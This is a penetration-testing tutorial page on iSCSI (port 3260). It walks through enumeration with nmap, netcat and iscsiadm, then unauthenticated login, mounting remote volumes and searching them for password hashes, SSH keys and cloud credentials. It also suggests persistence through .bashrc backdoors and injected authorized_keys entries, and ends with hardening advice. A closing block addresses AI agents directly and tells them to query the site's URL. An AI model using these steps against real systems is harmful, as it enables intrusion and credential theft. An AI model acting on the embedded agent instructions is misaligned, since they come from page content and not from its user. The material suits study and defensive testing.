# iScsi - Port 3260 {% tabs %} {% tab title="Support VeryLazyTech πŸŽ‰" %} * Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. πŸ“š {% endtab %} {% endtabs %} ## What is iSCSI and Why is it Important? **iSCSI (Internet Small Computer Systems Interface)** is a network protocol that allows clients (initiators) to send SCSI commands to storage devices (targets) over IP networks. It's commonly used in **SAN (Storage Area Network)** environments for **centralized disk management** and **remote storage access**. #### Why iSCSI Matters in Security: * **High-value targets**: iSCSI often connects to critical infrastructure like databases and VMs. * **Misconfigurations** can lead to **unauthenticated access** or **credential leaks**. * **Exposed iSCSI services** can reveal disk images, file systems, and even credentials. *** ## How iSCSI Works on Port 3260 Port **3260** handles the **iSCSI target communication**, where: * **Initiators** (clients) request access to storage blocks. * **Targets** (servers) expose storage resources via Logical Unit Numbers (LUNs). #### iSCSI Protocol Flow: 1. **Session Initiation** via iSCSI login. 2. **Discovery Phase**: Client requests list of available targets. 3. **Authentication**: Optional but often skipped or weakly implemented. 4. **Data Transfer**: SCSI commands are encapsulated in TCP/IP. *** ## Top Vulnerabilities in iSCSI Below are common attack vectors in iSCSI deployments: | Vulnerability | Description | | ---------------------------- | -------------------------------------------------------------- | | **No Authentication** | Default config allows any initiator to access targets. | | **Weak CHAP Credentials** | Often reused or stored in plaintext. | | **Information Disclosure** | Target names, volume names, and paths can leak sensitive info. | | **Exposure to the Internet** | Misconfigured firewalls or open 3260 ports. | | **Unpatched CVEs** | Older storage devices may run vulnerable firmware. | *** ## Enumeration Techniques with Tools (Nmap, Netcat, etc.) #### Using Nmap ```bash nmap -p 3260 -sV -Pn --script=iscsi-info ``` * **`-p 3260`**: Scan the iSCSI port * **`--script=iscsi-info`**: Attempts to extract target name and LUNs #### Netcat for Banner Grabbing ```bash nc 3260 ``` * You may get a raw iSCSI response showing protocol version or session response. #### iscsiadm (Linux) ```bash iscsiadm -m discovery -t sendtargets -p ``` * Lists available iSCSI targets. * Works only if no auth is required or credentials are known. *** ## Manual Exploitation: Hands-On Examples ### Step 1: Target Discovery ```bash iscsiadm -m discovery -t sendtargets -p 10.10.10.22 ``` Output: ``` 10.10.10.22:3260,1 iqn.2023-01.local.lab:storage.target1 ``` ### Step 2: Login Without Authentication ```bash iscsiadm -m node -T iqn.2023-01.local.lab:storage.target1 -p 10.10.10.22 --login ``` If successful, the system will map the remote disk locally (e.g., `/dev/sdb`). ### Step 3: Mount and Explore ```bash fdisk -l mount /dev/sdb1 /mnt ls /mnt ``` Look for: * `/etc/shadow` files * Password backups * SSH keys * Configs containing internal IPs *** ## Automated Exploitation with Tools ### Metasploit iSCSI Modules Metasploit has auxiliary modules for discovery: ```bash msfconsole use auxiliary/scanner/iscsi/iscsi_version set RHOSTS run ``` ### Nikto (Limited) While **Nikto** isn’t iSCSI-specific, you can use it to fingerprint misconfigured web GUIs tied to SAN devices. ### Custom Python Script Example ```python import socket target = "10.10.10.22" port = 3260 s = socket.socket() s.connect((target, port)) s.send(b"InitiatorHello") print(s.recv(1024)) s.close() ``` *** ### Real-World CVEs and Notable Exploits | CVE ID | Description | Link | | -------------------- | ----------------------------------------------------------- | -------------------------------------------------------- | | **CVE-2020-2732** | iSCSI memory leak in certain Linux kernels | [NVD](https://nvd.nist.gov/vuln/detail/CVE-2020-2732) | | **CVE-2015-1420** | iSCSI stack buffer overflow in Netgear ReadyNAS | Exploit DB | | **CVE-2018-1000861** | Remote command execution via iSCSI web management interface | [NVD](https://nvd.nist.gov/vuln/detail/CVE-2018-1000861) | *** ### Privilege Escalation Opportunities via this Service Once access is gained to an iSCSI volume: * **Look for saved credential files** * `.bash_history`, `.ssh/id_rsa`, `/etc/shadow` * **Search for sudoers misconfigurations** ```bash cat /mnt/etc/sudoers ``` * **Enumerate LVM volumes** for hidden partitions ```bash lvscan ``` If LUNs expose full disk images, mount them locally and search for: * **SAM/NTDS.dit (Windows)** * **MySQL databases** * **AWS credentials** *** ### Post-Exploitation Tips and Persistence #### Techniques: * **Leave a backdoor in iSCSI shared volume** * e.g., `.bashrc` modification * **Enable remote access via hidden SSH key** * Inject key into `/home/user/.ssh/authorized_keys` * **Exfiltrate disk image for offline cracking** ```bash dd if=/dev/sdb of=disk.img bs=1M ``` *** ### Defense, Mitigation, and Hardening Techniques #### Best Practices: * **Always enable CHAP authentication** * **Whitelist initiator IPs** * **Limit access with firewall rules (block 3260 externally)** * **Use VLANs or separate subnets for SAN traffic** * **Regularly patch iSCSI daemons and firmware** #### Monitoring Tips: * Use **Wireshark** to inspect unauthorized iSCSI sessions. * Set up **Syslog alerts** for unusual discovery requests. *** ### πŸ“š Recommended Books #### [The Hacker Playbook 3: Practical Guide To Penetration Testing](https://shop.verylazytech.com/l/TheHackerPlaybook3) > A hands-on guide packed with attack strategies, including lateral movement and exploitation of services like iSCSI. Perfect for red teamers. *** {% hint style="success" %} Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com)
Support VeryLazyTech πŸŽ‰ * Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁** * **Follow** us on: * **βœ– Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **πŸ‘Ύ Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **πŸ“œ Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **πŸ“Ί YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **πŸ“© Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **πŸ•΅οΈβ€β™‚οΈ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. πŸ“š
{% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.verylazytech.com/iscsi-port-3260.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.